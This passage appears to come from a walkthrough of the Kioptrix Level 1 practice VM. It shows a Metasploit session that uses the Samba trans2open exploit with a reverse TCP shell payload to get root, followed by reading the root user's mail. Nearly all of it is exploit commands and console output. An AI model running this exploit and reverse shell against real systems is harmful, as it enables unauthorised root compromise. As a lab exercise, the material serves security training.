HighOn.Coffee

use exploit/linux/samba/trans2open

msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.221.156  yes       The target address
   RPORT  139              yes       The target port


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.221.139  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

msf exploit(trans2open) > run

[*] [2015.12.20-21:05:39] Started reverse handler on 192.168.221.139:4444
[*] [2015.12.20-21:05:40] Trying return address 0xbffffdfc...
[*] [2015.12.20-21:05:41] Trying return address 0xbffffcfc...
[*] [2015.12.20-21:05:42] Trying return address 0xbffffbfc...
[*] [2015.12.20-21:05:43] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.221.139:4444 -> 192.168.221.156:1025) at 2015-12-20 21:05:44 -0500


^Z
Background session 1? [y/N]  N

id
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
^Z
Background session 1? [y/N]  y

sh-2.05# cd /var/spool/mail
cd /var/spool/mail
sh-2.05# ls
ls
harold
john
nfsnobody
root
sh-2.05# cat root   
cat root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from root@localhost)
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...